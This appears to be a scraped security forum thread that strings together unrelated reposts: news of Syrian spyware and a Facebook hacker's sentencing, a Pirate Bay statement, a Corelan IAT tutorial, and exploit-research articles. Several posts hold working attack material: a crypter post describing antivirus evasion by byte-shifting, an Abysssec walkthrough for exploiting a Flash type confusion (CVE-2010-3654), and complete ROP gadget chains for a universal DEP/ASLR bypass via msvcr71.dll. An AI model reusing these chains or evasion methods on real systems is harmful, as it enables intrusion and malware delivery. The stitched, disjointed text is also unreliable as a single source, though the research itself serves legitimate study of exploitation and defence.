She handed over her laptop to Othman and his colleague, who told her that the Trojan horse had logged her key strokes, taken screen shots, rummaged through her folders. It hid the IP address it sent its information to, Othman said. Othman found a screen shot the Trojan horse took of Susan's online banking home page. He told her to change all her passwords, Susan said. "You don't want your money to be stolen by some of the Syrian security guys," she quipped. The other virus -- backdoor.breut -- sends the information it pillages from infected computers to the IP address: 216.6.0.28 and does not hide this. "We checked the IP address that our engineer referenced and can confirm that it belongs to the STE (Syrian Telecommunications Establishment)," a Symantec representative wrote to CNN. The STE is the government telecommunications company. This does not necessarily mean that someone at STE is doing the hacking, Thakur stresses. "Whether it's a home user behind that or it's actually a company or an organization, which has been allocated that IP address, we just have no insight from where we sit." But the Syrian government has access to all activity through that server "absolutely without any doubt," Thakur said. Anyone not wanting the government to see what they are up to would not use that server. Skilled Syrian opposition activists avoid government telecom servers when online. The simple virus, backdoor.breut, acts like a bull in a china shop, Symantec's Thakur said. "It did not look like it was written by any sophisticated hacker," he said after examining it. "It was just kind of put together -- slapstick functionality." Simple malware is readily available for download on underground forums in the Internet. Hackers can repurpose it and hand it out. Othman believed the second software to be such an off-the-shelf product because of its amateurish construction, but the California expert disagrees. 
"It's not something that somebody just went out there, copied code from an Internet website and just pasted it in. It was definitely coded for its current purpose." The name "backdoor.breut" derives from the virus' behavior. "We sort of took the word 'brute' just because of what it was actually doing and kind of changed a couple of characters to b-r-e-u-t," Thakur said. "Brute -- meaning that it is using brute force -- it's just going in smash-and-grab -- I'm going to try to get anything that I can and get the hell out of there." Backdoor.breut attempts to give the hacker remote control of the victim's computer, according to the analysis. It steals passwords and system information, downloads new programs, guides internal processes, logs keystrokes and takes shots with the webcam. It also turns off antivirus notification, but that does not completely conceal it from detection. "Some of the good software can detect it in the same day," Thakur said. The nature of its use may make backdoor.breut and other new Syrian malware hard to defend against. Antivirus makers need to know the virus to be able to assign it a signature and make the file detectible to block the download, according to Thakur. The more widely a new virus spreads around the world, the more likely it is to land on an antivirus maker's radar. The smaller the region the virus is located in, the less likely virus vigilantes are to notice and combat it. "Looking at this Trojan and the telemetry that we've gathered the last five or six days since we did the analysis, this is not targeting people across the complete globe. So, it could be days before some antiviruses actually create signatures for the file," Thakur said. More complex antivirus software can detect malware that does not yet have a signature, because of how it behaves after infecting the computer, Thakur said. If the antivirus does not have this 'behavior' component, it may not defend against a new virus "for a substantial amount of time." 
On a Facebook page named "Cyber Arabs," Othman warns activists of the danger of downloading the virus and reminds users to keep their antivirus software updated. Download.com, CNET's software download website, offers antivirus software, some of which includes a "behavior" component and is free of charge. But that is still no guarantee for not contracting a new Syrian cyberbug, "Susan" reminds. "It was up-to-date," she said. "The problem is that they sent me a ... file, and I was totally stupid -- like, it's an EXE file -- and I opened it." Sursa: Spyware Is Newest Weapon In Syrian Conflict ≈ Packet Storm
  9. [h=1]York Facebook hacking student Glenn Mangham jailed[/h] 17 February 2012 Last updated at 19:44 GMT A software development student from York who hacked into Facebook has been jailed for eight months. Glenn Mangham, 26, had earlier admitted infiltrating the social networking website between April and May 2011. Mangham, of Cornlands Road, York, had shown search engine Yahoo how it could improve security and said he wanted to do the same for Facebook. Sentencing Mangham, Judge Alistair McCreath said his actions could have been "utterly disastrous" for Facebook. Alison Saunders, from the Crown Prosecution Service, described the case as "the most extensive and flagrant incidence of social media hacking to be brought before British courts". Prosecutor Sandip Patel rejected Mangham's claims, saying: "He acted with determination, undoubted ingenuity and it was sophisticated, it was calculating." Facebook spent $200,000 (£126,400) dealing with Mangham's crime, which triggered a "concerted, time-consuming and costly investigation" by the FBI and British law enforcement, Mr Patel said. Electronic footprint The prosecutor told Southwark Crown Court in London how Mangham had "unlawfully accessed and hacked into the social media website Facebook and its computers in April to May last year from his bedroom in Yorkshire". Mangham had ultimately stolen "invaluable" intellectual property, which he downloaded on to an external hard drive, said Mr Patel. Facebook discovered the infiltration during a system check even though the defendant deleted his electronic footprint to cover his tracks. Mr Mangham's defence lawyer Tom Ventham had said his client was an ethical hacker who had a "high moral stance" and Yahoo had "rewarded" him for pointing out its vulnerabilities previously. He added that when Mangham was arrested he made "copious" admissions to police about what he had done. 
Passing sentence, Judge Alistair McCreath told Mangham his actions were not harmless and had "real consequences and very serious potential consequences" for Facebook. 'Not harmless' "You and others who are tempted to act as you did really must understand how serious this is," he said. "The creation of that risk, the extent of that risk and the cost of putting it right mean at the end of it all I'm afraid a prison sentence is inevitable." Mr McCreath said while he acknowledged that Mangham had never intended to pass on any of the information he had gathered, nor did he intend to make any money from it, his activities were "not just a bit of harmless experimentation". "You accessed the very heart of the system of an international business of massive size, so this was not just fiddling about in the business records of some tiny business of no great importance," he said. A spokesperson for Facebook said they "applauded" the work of the police and Crown Prosecution Service in this case, "which did not involve any compromise of personal user data". They added: "We take any attempt to gain unauthorised access to our network very seriously, and we work closely with law enforcement authorities to ensure that offenders are brought to justice." Sursa: Gammarays Jailed For Hacking Facebook ≈ Packet Storm
  10. The encryption algorithm has nothing to do with it; antiviruses detect the loading into memory, or go by other unique aspects of the executable (more precisely the stub's entry point, the section sizes, or who knows what else). For my two-lei crypter I used a stupid algorithm: add 65 to each byte. If it goes above 255, subtract 255. Something like that, I don't even remember exactly, and it worked without any problem, because EVERYTHING in the encrypted file changes, but NOTHING changes in the stub.
  11. Pirate Bay hits out at delusional recording industry The cartel must be stopped By Dave Neal Fri Feb 17 2012, 13:26 FILE SHARING WEB SITE The Pirate Bay has responded to criticisms from the Recording Industry Association of America (RIAA), painting the organisation as quite mad. The RIAA fired the first salvo in the war of words, as other battles are being waged online and in government, when it accused The Pirate Bay of being a dreadful copyright thief. The RIAA was commenting on the Pirate Bay's decision to up sticks and move to a Swedish .se web domain and accused it of being brazen, and "one of the worst of the worst". "A blatantly illegal file-sharing site, proud that it's an online bazaar of every conceivable U.S. copyrighted work, found criminally responsible by its own country's legal system and who has been ordered by courts in at least seven European countries to be blocked by ISPs, has publicly acknowledged changing its domain name to escape U.S. laws," wrote the RIAA in a blog post. "It is motivated by its brazen philosophy of thumbing its nose at the basic rights of America's creators. It is, in a phrase, one of the worst of the worst." A spokesman for The Pirate Bay has responded in a guest post at Torrentfreak. There a spokesman named "Winston" - with credit to George Orwell - said that this statement shows how detached and delusional the music industry has become. "The piece gives us ample information on just how delusional the recording industry really is, and shows why they must be stopped," said Winston in response to the post from Mitch Glazier, an impressively over-titled senior executive vice president at the RIAA. "In the very first sentence Glazier uses the phrase 'copyright theft'. It's an interesting concept - if anyone in history ever stole copyright, it must be the record industry... A small lesson to Mr Glazier: If someone steals something, you don't have it anymore. If you copy it, both have it.
This means: If someone steals your copyright (aka 'copyright theft') you don't have the copyright anymore. I'm having a hard time to see that happening though, since copyright isn't really physical." Winston pokes fun at the RIAA, saying that it is out of date and relying on archaic arguments to shore up its cause. "Maybe (jobs lost to 'piracy') just aren't needed anymore! That's what technology does! Sorry, it's 2012 not 1912 - do you want to forbid robots as well, since they steal jobs?" he asks. Referring back to Glazier's comment about the web site being banned in a number of countries, and relating it to the recent European Court of Justice Sabam decision that outlawed monitoring and filtering content, he suggested that the RIAA might be supporting illegal activity. "And Mr. Glazier, talking about the countries in the EU that you have forced ISPs to block TPB (and other sites) is interesting, as the European Court has just decided that these types of censorship are just that - censorship, and should be treated as illegal," he added. "Could we see your view on the matter, as the RIAA is clearly supporting illegal censorship?" There is no love lost between the parties, of course, and while the RIAA suggests that it wants to work with the technology industry, The Pirate Bay will have nothing to do with it. "F*ck that. You're not in charge. If you want the help of the tech industry, ask for it. You'll probably get it since most tech people are nice. You're not in charge anymore and that's probably why you're pissed off," he said. "The recording industry is like a kid screaming for candy. The problem is that the kid has diabetes." µ
  12. [h=2]Exploiting Adobe Flash Player on Windows 7[/h] Posted by shahin in advisory, Exploits / BUG Decryption, Fuzzing / Auditing, reversing. Hello again. As a lot of readers like Windows 7 exploits, here is another one. [h=2]1) Advisory information[/h]
Title: Adobe Flash Player ActionScript type confusion
Version: flash10h.dll
Discovery: Malware writers
Exploit: Abysssec Information Security and Vulnerability Research Group
Vendor: http://www.adobe.com
Impact: Critical
Contact: info [at] abysssec.com
Twitter: @abysssec
CVE: CVE-2010-3654
[h=2]2) Vulnerable version[/h] Adobe Flash Player 10.1.53.64 and prior versions. [h=2]3) Vulnerability information[/h]
Class: 1 - Type Confusion
Impact: Successfully exploiting this issue allows remote attackers to execute code in the context of the targeted browser.
Remotely Exploitable: Yes
Locally Exploitable: Yes
[h=2]4) Vulnerability detail[/h] Here we have a type confusion vulnerability in the ActionScript bytecode language. The cause is the implementation of the verification process in the AS3 JIT engine: because of a miscalculation in verifying datatype atoms, data of one type is substituted for data of another type, and the confusion results in faulty machine code. ActionScript has the following structure. First our scripts are compiled, using an ActionScript compiler like Flex, to AS3 bytecode, which is embedded in DoABC, DoAction or DoInitAction tags in the SWF file format. When Flash Player opens the SWF file, the bytecode is compiled to JITted machine code through a verification and a generation process. The verification process is responsible for checking that the bytecode consists of valid instructions and passes the valid bytecode on to the generation process, which then produces the machine code in memory.
According to Dion Blazakis's JIT Spray paper: "To handle this runtime typing requirement, the ActionScript interpreter represents internal objects using tagged pointers – internally, this object is called an "atom". Tagged pointers are a common implementation technique to differentiate between those objects stored by value and those stored by reference using the same word-sized memory cell. A tagged pointer stores type information in the least significant bits and stores a type-specific value in the most significant bits. As shown in Illustration 1, the ActionScript atom is 32 bits wide; it allocates 3 bits to store the type information and uses 29 bits for the value." So if it were possible to confuse the verifier into treating one atom as another through some bytecode changes, it would be possible to generate faulty code, which most of the time leads to exposing a vtable pointer call to the attacker. The bug is presented perfectly in Haifei Li's recent slides. We have OriginalClass and RefClass with the same functions. Func1 of OriginalClass returns a class object, but Func1 of RefClass returns another type. By changing a byte in the bytecode we have confused AS3 into executing RefClass functions in the main class. After that the verifier confuses the return type of the function with an OriginalClass object and generates faulty code with the vtable under the control of the return value. Exploitation: For exploitation on Windows 7 with its recent protections and without any 3rd-party software, it is possible to use the same bug many times to leak the image base address and the payload address. In our exploit we used three confusions to read String object addresses and from those the image base address. Step 1: read the shellcode String object pointer by confusing it with uint and use it to leak the ImageBase. Step 2: leak the address of the shellcode with the same pointer and the NewNumber trick.
Step 3: send the imageBase and the shellcode address as parameters to the RopPayload function, build the ROP payload string, and again confuse the return value with uint to read the address of the RopPayload string. Step 4: send the address of the ROP payload as a parameter to the last confused function, which confuses the String type with a class object. Thus the address of our ROP payload will be used as the vtable of the fake class object. Note: when using strings as a buffer for shellcode in ActionScript, it is important to use alphanumeric characters, because the toString method converts our ASCII character set to Unicode and thus makes our shellcode unusable. [h=2]5) Conclusion[/h] Finally we got to the point that memory leaks are extremely useful in modern exploitation to bypass the DEP and ASLR protections. It would be possible to find the same atom confusion situation and other object leaks in Adobe Flash Player. Kudos to Haifei Li for his great research, although it was not that simple to implement a reliable exploit from just the slides without attending the talk. [h=2]6) References[/h] http://www.cansecwest.com/csw11/Flash_ActionScript.ppt http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf [h=2]7) Exploit-Code[/h] Here you can get our reliable exploit against Windows 7 (calc.exe payload). Download: CVE-2010-3654_Win7. If you need other payloads, for sure you know how to change it. As always, feedback is welcome, and you can follow @abysssec on Twitter to get updates. Happy Hunting! Sursa: Exploiting Adobe Flash Player on Windows 7 | Abysssec Security Research
  13. [h=2]Many roads to IAT[/h]
Published December 1, 2011 | By Dinos

[h=3]Introduction[/h]
A few days ago a friend approached me and asked how he could see the import address table under Immunity Debugger and if this could be done using the command line. I figured this would be a good time to take a look at what the IAT is, how we can list the IAT and what common reversing hurdles there could be with regards to the IAT.

Let's first see what the IAT is and why it's good to know what is in there. IAT stands for Import Address Table and according to Wikipedia, "One section of note is the import address table (IAT), which is used as a lookup table when the application is calling a function in a different module. It can be in form of both import by ordinal and import by name. Because a compiled program cannot know the memory location of the libraries it depends upon, an indirect jump is required whenever an API call is made. As the dynamic linker loads modules and joins them together, it writes actual addresses into the IAT slots, so that they point to the memory locations of the corresponding library functions. Though this adds an extra jump over the cost of an intra-module call resulting in a performance penalty, it provides a key benefit: The number of memory pages that need to be copy-on-write changed by the loader is minimized, saving memory and disk I/O time. If the compiler knows ahead of time that a call will be inter-module (via a dllimport attribute) it can produce more optimized code that simply results in an indirect call opcode."

By knowing what's inside the IAT we can identify functions that are called from other modules in a program, look for possibly unwanted or strange behavior (in cases of viruses / malware), make the code under the debugger easier to read and find the address location of functions of interest (VirtualAlloc, HeapCreate, SetProcessDEPPolicy, NtSetInformationProcess, VirtualProtect, WriteProcessMemory).
In case you haven't figured it out, you can use those functions to bypass DEP. Having an accurate pointer in the IAT to one of the functions will make it trivial to call the function in a ROP chain.

[h=3]How can we query or list entries in the IAT ?[/h]
[h=4]Windbg[/h]
Windbg is many times the debugger of my choice, not because it's the easiest to use, but mostly because I got used to the interface and the fast response. Doing things under windbg in most cases will take far less time if you know the way, and far more time if you are still trying to find your way. After launching windbg, this is what you'll get: You can start a debugging process under windbg by launching an application in the debugger (File – Open) or by attaching the debugger to a running application (File – Attach). For the purpose of this example we are going to use notepad.exe as the test file; windbg will load the modules and it will stop just before the execution of the program, waiting for a command. All modules loaded at this moment can be viewed on the screen.

As opposed to the other two debuggers, windbg lacks the easy drop-down menu commands and identifying the IAT requires a bit more time. First we need to locate the address of the Import Address Table in our executable; to do so the command !dh will be used. The !dh command will Display the Headers of the requested module (more on the commands at: http://windbg.info/doc/1-common-cmds.html), where we can identify the location (address) of the IAT. In my example the IAT for notepad is located at memory address 1000 of the module notepad.exe. To dump the contents of that address we need to add the image base of our file to the memory address of the IAT table; this can be done easily in two ways, either by using "dps notepad+1000 l1000/8" or by giving the image base address, "dps 00c10000+1000 l1000/8". The dps command stands for "display pointer-sized contents of memory in the given range".
The output of the dps command will give us a lengthy result with the contents of the IAT table and the location of the functions. Another method, again for windbg and a bit more elegant, is described at OSR's windbg List: Import Table Functions, using the following windbg script:

```
r $t0 = poi(${$arg1}+poi(${$arg1}+0x3c)+0xd8)
r $t1 = poi(${$arg1}+poi(${$arg1}+0x3c)+0xdc)
dps ${$arg1}+$t0 l? (($t1+4)/4)
```

Saving the script under a name, e.g. test1.txt, in the windbg directory and calling the script from windbg with $$>a< test1.txt notepad, we will have the following output in the debugger:

```
0:000> $$>a< test1.txt notepad
00121000 760e14d6 ADVAPI32!RegSetValueExWStub
00121004 760e46ad ADVAPI32!RegQueryValueExWStub
00121008 760e469d ADVAPI32!RegCloseKeyStub
0012100c 760e1514 ADVAPI32!RegCreateKeyW
00121010 760e468d ADVAPI32!RegOpenKeyExWStub
00121014 760e448e ADVAPI32!IsTextUnicode
00121018 760e369c ADVAPI32!CloseServiceHandleStub
0012101c 760db537 ADVAPI32!QueryServiceConfigWStub
00121020 760dca4c ADVAPI32!OpenServiceWStub
00121024 760dca64 ADVAPI32!OpenSCManagerWStub
00121028 00000000
0012102c 763d55de kernel32!FindNLSStringStub
00121030 763ba125 kernel32!GlobalAllocStub
00121034 763ba183 kernel32!GlobalUnlock
00121038 763ba235 kernel32!GlobalLock
0012103c 763bafc0 kernel32!GetTimeFormatW
00121040 763bb1a2 kernel32!GetDateFormatW
00121044 763baaef kernel32!GetLocalTimeStub
00121048 763b2b7b kernel32!GetUserDefaultUILanguageStub
0012104c 763bc3c0 kernel32!HeapFree
00121050 77a82dd6 ntdll!RtlAllocateHeap
00121054 763bfcdd kernel32!GetProcessHeapStub
00121058 763bbdad kernel32!GetFileInformationByHandleStub
0012105c 763bc452 kernel32!InterlockedExchangeStub
00121060 763b0368 kernel32!FreeLibraryAndExitThreadStub
00121064 763c4c14 kernel32!GetFileAttributesWStub
00121068 763ffd71 kernel32!Wow64RevertWow64FsRedirectionStub
... <snip> ...
001213e0 77a64168 ntdll!RtlInitUnicodeString
001213e4 77a760f8 ntdll!NtQueryLicenseValue
001213e8 77a504a5 ntdll!WinSqmAddToStream
001213ec 00000000
001213f0 74f91a15 VERSION!GetFileVersionInfoExW
001213f4 74f918e9 VERSION!GetFileVersionInfoSizeExW
001213f8 74f91b51 VERSION!VerQueryValueW
001213fc 00000000
00121400 90909090
```

Common commands for windbg: Common WinDBG Commands Reference - Willy's Cave - Site Home - MSDN Blogs

Tutorial: https://www.corelan.be/index.php/2011/12/01/roads-iat/

vbulletin is crap.
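As an added example (not part of Dinos's post and not Corelan's tooling), the following Python turns a dps listing of the kind shown above into a per-module import inventory and flags what a defender looks at: non-zero slots that dps could not resolve to an exported symbol, and imports from the watchlist the post names. The listing it runs on is a constructed excerpt in the same format; the addresses in it are sample values.

```python
import re
from collections import OrderedDict

# Constructed excerpt in the format of the dps listing above (sample values, not a real dump).
SAMPLE_DPS = """\
0:000> $$>a< test1.txt notepad
00121000 760e14d6 ADVAPI32!RegSetValueExWStub
00121004 760e46ad ADVAPI32!RegQueryValueExWStub
00121008 00000000
0012100c 763bc3c0 kernel32!HeapFree
00121010 763b0123 kernel32!VirtualProtectStub
00121014 77a82dd6 ntdll!RtlAllocateHeap
00121018 00000000
0012101c 90909090
"""

# The functions the post singles out as usable for turning DEP off from a ROP chain;
# knowing which of them a binary imports is the defender's view of the same list.
WATCHLIST = ("VirtualAlloc", "HeapCreate", "SetProcessDEPPolicy",
             "NtSetInformationProcess", "VirtualProtect", "WriteProcessMemory")

# <slot address> <pointer value> [module!symbol]
LINE_RE = re.compile(r"^([0-9a-fA-F]{8})\s+([0-9a-fA-F]{8})(?:\s+(\S+))?$")


def parse_dps(text):
    """Turn dps output into (slot, value, symbol) tuples; symbol is None when unresolved."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:          # prompt line, blank line or a "<snip>" marker
            continue
        slot, value, sym = m.groups()
        entries.append((int(slot, 16), int(value, 16), sym))
    return entries


def group_by_module(entries):
    """Resolved imports keyed by module name (the part before '!'), in IAT order."""
    modules = OrderedDict()
    for _slot, _value, sym in entries:
        if sym is None:
            continue
        module, _, func = sym.partition("!")
        modules.setdefault(module, []).append(func)
    return modules


def unresolved_slots(entries):
    """Non-zero slots that dps could not map to a symbol.

    A zero slot is normal: it terminates one module's run of imports. A non-zero
    value with no symbol means either that the dump ran past the end of the table
    (dps was given a fixed length) or that the slot no longer points into any
    loaded module's exports, which is what an IAT hook or a corrupted table looks like.
    """
    return [(slot, value) for slot, value, sym in entries
            if sym is None and value != 0]


def watchlist_hits(entries, watchlist=WATCHLIST):
    """Imports whose name (ignoring the 'Stub' suffix dps shows) is on the watchlist."""
    hits = []
    for slot, _value, sym in entries:
        if sym is None:
            continue
        func = sym.partition("!")[2]
        base = func[:-4] if func.endswith("Stub") else func
        if base in watchlist:
            hits.append((slot, sym))
    return hits


if __name__ == "__main__":
    parsed = parse_dps(SAMPLE_DPS)
    for module, funcs in group_by_module(parsed).items():
        print("%-10s %d imports" % (module, len(funcs)))
    for slot, value in unresolved_slots(parsed):
        print("check slot %08x: value %08x has no symbol" % (slot, value))
    for slot, sym in watchlist_hits(parsed):
        print("watchlist: %08x -> %s" % (slot, sym))
```

Feed it the full dps output saved from the debugger to get the same inventory for a real process.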
  14. [h=2]mona.py – the manual[/h]
Published July 14, 2011 | By Corelan Team (corelanc0d3r)

[h=2]Introduction[/h]
This document describes the various commands, functionality and behaviour of mona.py. Released on June 16, this pycommand for Immunity Debugger replaces pvefindaddr, solving performance issues, offering numerous improvements and introducing tons of new features. pvefindaddr will still be available for download until all of its functionality has been ported over to mona.

[h=2]Downloading mona.py[/h]
The mona project page is located here: mona - Overview - Corelan Team

There are 2 versions of mona: a "stable" release and a trunk release. The stable release only gets updated once in a while (basically minor and major version updates); the trunk release is the one that has all the "bleeding edge" changes, patches, etc. "Stable" only refers to the fact that there are not a lot of changes (so no unexpected behaviour). It does not mean it is bug-free, it only means the bugs (if any) won't get fixed until a next release. You can download the stable release here, but I recommend using the trunk release, which can be downloaded here. In fact, all documentation (including this one) is based on trunk releases, so if something is working differently in the stable release, we'll ask you to start using the trunk release anyway.

Together with the release of this documentation, we are also proud to be able to release mona.py v1.1. The current stable version of mona.py is 1.1, the current trunk version of mona.py is dev-v1.2.

Important: Mona only works on Immunity Debugger 1.8x and up.

When you have downloaded mona.py, simply save the file into the PyCommands folder. In a typical installation, this folder is located here: C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

That's it. mona.py is now installed.

[h=2]Basic usage[/h]
Open Immunity Debugger. At the bottom of the application you should see an input box (command bar). Enter !mona and press return.
Open the log window (ALT-L) and you should get a full page of information about mona (options and commands). At the top, you can find the global options. The second half of the output contains all available commands. If you want more information about the use of a certain command, you can simply run !mona help <command>. Suppose you want more info about the use of the "assemble" command, run !mona help assemble.

Output:
-----------------------------------------------------------------------------------

Tutorial: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
  15. [h=2]Universal DEP/ASLR bypass with msvcr71.dll and mona.py[/h]
Published July 3, 2011 | By Corelan Team (corelanc0d3r)

[h=2]Introduction[/h]
Over the last few weeks, there has been some commotion about a universal DEP/ASLR bypass routine using ROP gadgets from msvcr71.dll and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. For the record, I don't know exactly what happened nor have I seen the proof… so I'm not going to make any statements about this or judge anyone. Furthermore, this post is not about the incident, but about the routine itself (which looks pretty slick) and alternative routines.

[h=2]The White Phosphorus version[/h]
Released as part of the White Phosphorus Exploit Pack, the routine only uses gadgets and a pointer to VirtualProtect from msvcr71.dll. That particular version of the dll does not rebase and is not ASLR enabled either, which makes it a perfect candidate for a universal/generic DEP & ASLR bypass, provided that it contains all required gadgets to perform a generic ROP routine. If your target application has that particular version of the dll loaded (or if you can force it to load one way or another), you can use the ROP chain to bypass DEP and ASLR in a generic way. Immunity Inc published the bypass technique on their website. The routine looks like this:

```python
from struct import pack  # import added here; the snippet is an excerpt from a larger file

def wp_sayonaraASLRDEPBypass(size=1000):
    # White Phosphorus
    # Sayonara Universal ASLR + DEP bypass for Windows [2003/XP/Vista/7]
    #
    # This technique uses msvcr71.dll which has shipped unchanged
    # in the Java Runtime Environment since v1.6.0.0 released
    # December 2006.
    #
    # mail: support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml
    print "WP> Building Sayonara - Universal ASLR and DEP bypass"
    size += 4 # bytes to shellcode after pushad esp ptr
    depBypass = pack('<L', 0x7C344CC1)  # pop eax;ret;
    depBypass += pack('<L', 0x7C3410C2) # pop ecx;pop ecx;ret;
    depBypass += pack('<L', 0x7C342462) # xor chain; call eax {0x7C3410C2}
    depBypass += pack('<L', 0x7C38C510) # writeable location for lpflOldProtect
    depBypass += pack('<L', 0x7C365645) # pop esi;ret;
    depBypass += pack('<L', 0x7C345243) # ret;
    depBypass += pack('<L', 0x7C348F46) # pop ebp;ret;
    depBypass += pack('<L', 0x7C3487EC) # call eax
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack("<i", -size)      # {size}
    depBypass += pack('<L', 0x7C34D749) # neg eax;ret; {adjust size}
    depBypass += pack('<L', 0x7C3458AA) # add ebx, eax;ret; {size into ebx}
    depBypass += pack('<L', 0x7C3439FA) # pop edx;ret;
    depBypass += pack('<L', 0xFFFFFFC0) # {flag}
    depBypass += pack('<L', 0x7C351EB1) # neg edx;ret; {adjust flag}
    depBypass += pack('<L', 0x7C354648) # pop edi;ret;
    depBypass += pack('<L', 0x7C3530EA) # mov eax,[eax];ret;
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment}
    depBypass += pack('<L', 0x7C355AEB) # sub eax,30;ret;
    depBypass += pack('<L', 0x7C378C81) # pushad; add al,0xef; ret;
    depBypass += pack('<L', 0x7C36683F) # push esp;ret;
    print "WP> Universal Bypass Size: %d bytes"%len(depBypass)
    return depBypass
```

(22 dwords)

Triggered by the Metasploit bounty "incident", the fact that Abysssec published a post/document just a few hours ago, and because Immunity already released the routine, I decided to take a look myself & see if there would be another way to build an alternative DEP/ASLR bypass routine from msvcr71.dll.
[h=2]The alternative version (mona.py)[/h]
I attached Immunity Debugger to an application that has the dll loaded, and used mona.py to create a database with rop gadgets & have it produce a rop chain. Since the one written as part of White Phosphorus doesn't have any null bytes, I will try to do the same thing. This is the result:

Command used:

17 seconds later, I got this:

```ruby
rop_gadgets = [
  0x7c346c0a,  # POP EAX # RETN (msvcr71.dll)
  0x7c37a140,  # <- *&VirtualProtect()
  0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (msvcr71.dll)
  0x????????,  # ** <- find routine to move virtualprotect() into esi
               # ** Hint : look for mov [esp+offset],eax and pop esi
  0x7c376402,  # POP EBP # RETN (msvcr71.dll)
  0x7c345c30,  # ptr to 'push esp # ret ' (from msvcr71.dll)
  0x7c346c0a,  # POP EAX # RETN (msvcr71.dll)
  0xfffffdff,  # value to negate, target value : 0x00000201, target: ebx
  0x7c351e05,  # NEG EAX # RETN (msvcr71.dll)
  0x7c354901,  # POP EBX # RETN (msvcr71.dll)
  0xffffffff,  # pop value into ebx
  0x7c345255,  # INC EBX # FPATAN # RETN (msvcr71.dll)
  0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (msvcr71.dll)
  0x7c34d201,  # POP ECX # RETN (msvcr71.dll)
  0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7,  # POP EDI # RETN (msvcr71.dll)
  0x7c34b8d8,  # ROP NOP (-> edi)
  0x7c344f87,  # POP EDX # RETN (msvcr71.dll)
  0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1,  # NEG EDX # RETN (msvcr71.dll)
  0x7c346c0a,  # POP EAX # RETN (msvcr71.dll)
  0x90909090,  # NOPS (-> eax)
  0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (msvcr71.dll)
  # rop chain generated by mona.py
  # note : this chain may not work out of the box
  # you may have to change order or fix some gadgets,
  # but it should give you a head start
].pack("V*")
```

Interesting… mona.py generated an almost complete ROP chain using gadgets and pointers from msvcr71.dll.
It is slightly larger than the one written by Immunity (so yes, the one that is part of WP is most likely better), but I just wanted to see if there was an alternative available. The only thing that is missing from the one mona generated is a routine that would put the VirtualProtect() pointer (in eax) into esi. mona.py didn't find any obvious gadgets that would simply do something such as "mov esi,eax", so I had to manually search for an alternative. But as mona.py suggested, I simply had to find a gadget that would write the value in eax onto the stack, so you can pick it up in esi later on. In order to do so, you probably need 2 or 3 gadgets: one to get the stack pointer, a second one to write the value onto the stack and a third one to pick it up (pop esi). After searching the generated rop.txt file for a few minutes, I found the following 2 gadgets that will do this:

```
0x7c37591f : # PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN
```

That should work. Using those 2 gadgets, we can simply write the pointer to VirtualProtect() onto the stack and pick it up in ESI. In fact, the second gadget will write and pick up in the same gadget. We just need to make ECX point at the correct location on the stack and make sure POP ESI will take it from that location. Note that the first gadget requires EAX to contain a valid pointer to a readable location. So all we would have to do to make it readable is pop a readable address from msvcr71.dll into EAX first. Putting all of this together, the chain looks like this:

```ruby
rop_gadgets = [
  0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
  0x7c37a140,  # Make EAX readable
  0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
  0x41414141,  # EBP (filler)
  0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
  0x7c37a140,  # <- *&VirtualProtect()
  0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
  0x7c346c0b,  # Slide, so next gadget would write to correct stack location
  0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
  0x41414141,  # EDI (filler)
  0x41414141,  # will be patched at runtime (VP), then picked up into ESI
  0x41414141,  # EBX (filler)
  0x7c376402,  # POP EBP # RETN (msvcr71.dll)
  0x7c345c30,  # ptr to 'push esp # ret ' (from MSVCR71.dll)
  0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
  0xfffffdff,  # size 0x00000201 -> ebx, modify if needed
  0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
  0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
  0xffffffff,  # pop value into ebx
  0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
  0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
  0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
  0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
  0x7c34b8d8,  # ROP NOP (-> edi)
  0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
  0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
  0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
  0x90909090,  # NOPS (-> eax)
  0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
  # rop chain generated with mona.py
].pack("V*")
```

31 dwords… 9 dwords larger than the commercial one from White Phosphorus… but it proves my point. It took me less than 10 minutes to build this chain, it's universal and bypasses DEP and ASLR.

Oh, by the way, in case you didn't know… if you have other bad chars (so let's say you also need to avoid using '\x0a' and '\x0d') then you could just run

```
!mona rop -m msvcr71.dll -n -cpb '\x0a\x0d'
```

and get other pointers… yes, it's that simple.

[h=2]Conclusion[/h]
No matter how nice & 'tempting' a certain solution looks, there always might be an alternative, and creativity often leads to results.

